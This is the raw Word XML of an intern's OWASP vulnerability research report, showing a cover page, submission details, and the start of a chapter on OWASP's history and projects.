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873D79" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="36" w:space="0" w:color="1A56DB"/>
        </w:pBdr>
        <w:spacing w:after="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174DFCDD" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:spacing w:val="80"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VORTEX TECH  ·  INTERNSHIP PROGRAM 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EA5CB7" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF39553" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB45782" w14:textId="1DD6A711" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top </w:t>
      </w:r>
      <w:r w:rsidR="00D66BA1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="68"/>
          <w:szCs w:val="68"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8E0591" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="333333"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Vulnerability Research Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657888BB" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C224DD7" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="1A56DB"/>
        </w:pBdr>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B111E21" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cyber Security Internship Track   ·   Week 1 of 4   ·   Beginner Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABD967A" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6642B2E4" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:spacing w:val="60"/>
        </w:rPr>
        <w:t>SUBMISSION DETAILS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0536FF" w14:paraId="08EBB719" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27D5B63D" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t>Intern Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CBCFABB" w14:textId="7A7DFBB4" w:rsidR="000536FF" w:rsidRDefault="00D66BA1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t>Ali Ameer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000536FF" w14:paraId="5E06A2DD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55DBE16B" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t>Track</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F63AD92" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t>Cyber Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000536FF" w14:paraId="402DF970" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FA2D69F" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t>Week</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65105F89" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t>Week 1 — Research &amp; Documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000536FF" w14:paraId="431FAB04" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3EC72264" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t>Submission Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="787F34F6" w14:textId="64CD3A2C" w:rsidR="000536FF" w:rsidRDefault="00D66BA1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">7 – 7 – 2026 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000536FF" w14:paraId="542E9A33" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30F096CA" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t>GitHub Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18D59129" w14:textId="3436A889" w:rsidR="000536FF" w:rsidRDefault="00D66BA1">
            <w:r>
              <w:t>Github.com/ameer-18-star/</w:t>
            </w:r>
            <w:r w:rsidR="00E16061">
              <w:t>vortextech-cybersec-week1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000536FF" w14:paraId="497426D3" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1ADE7B3C" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t>Email Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="642A6511" w14:textId="3AD29878" w:rsidR="000536FF" w:rsidRDefault="00E16061">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t>virtualmentorshelper@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08024AD7" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AFDD9F1" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A56DB"/>
          <w:spacing w:val="60"/>
        </w:rPr>
        <w:t>TASK OBJECTIVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EE976" w14:textId="66E2611D" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:spacing w:after="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">Build a strong theoretical foundation by researching and documenting the most common web application security vulnerabilities, as defined by the OWASP Top </w:t>
      </w:r>
      <w:r w:rsidR="00421A2B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve"> the industry-standard reference every security professional knows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F37D3" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73BD58F7" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
        </w:pBdr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420AE83A" w14:textId="01B4F152" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="888888"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Vortex Tech  ·  Internship Program 2026  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377BD382" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="00C93359">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>This document is for internal program use by enrolled Vortex Tech interns only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E0549" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="36" w:space="0" w:color="1A56DB"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCD79F1" w14:textId="77777777" w:rsidR="000536FF" w:rsidRDefault="000536FF">
      <w:pPr>
        <w:sectPr w:rsidR="000536FF">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1080" w:right="1260" w:bottom="1080" w:left="1260" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CA0F37" w14:textId="1E493C1E" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 1: OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B67623"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The Open Web Application Security Project (OWASP) is an international non-profit organization dedicated to web application security. For over two decades, it has operated under a "collaborative open-source" philosophy, ensuring its resources are free and accessible to anyone wanting to improve their security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDF0FA8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. The History and Evolution of OWASP The Early Days (2001–2004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61686C15"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 xml:space="preserve">OWASP was founded on </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>September 1, 2001</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , by Mark </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Curphey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>, an information security specialist who saw a critical gap in how the industry approached web application code. Unlike network security, which relied heavily on firewalls, web application code was highly custom, exposed to the public, and deeply vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07497A"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 xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>2004</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , OWASP was formally structured as a non-profit organization. It established local chapters globally, allowing security professionals, developers, and researchers to share knowledge freely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789AC414" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Becoming an Industry Standard (2004–Present)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64612FB8"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 xml:space="preserve">As web technologies evolved from simple static HTML pages to complex, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>APIdriven</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> single-page applications (SPAs) and cloud-native architectures, OWASP evolved alongside them. It expanded its project portfolio to include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F709ACE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OWASP ASVS</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Application Security Verification Standard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEFBF6F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OWASP SAMM</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Software Assurance Maturity Model)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118FBCB3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Zed Attack Proxy), a widely used penetration testing tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5246DB6B"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Today, OWASP serves as the backbone for compliance frameworks worldwide. Regulatory frameworks like PCI-DSS, FTC regulations, and NIST guidelines explicitly require alignment with OWASP standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C8126" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
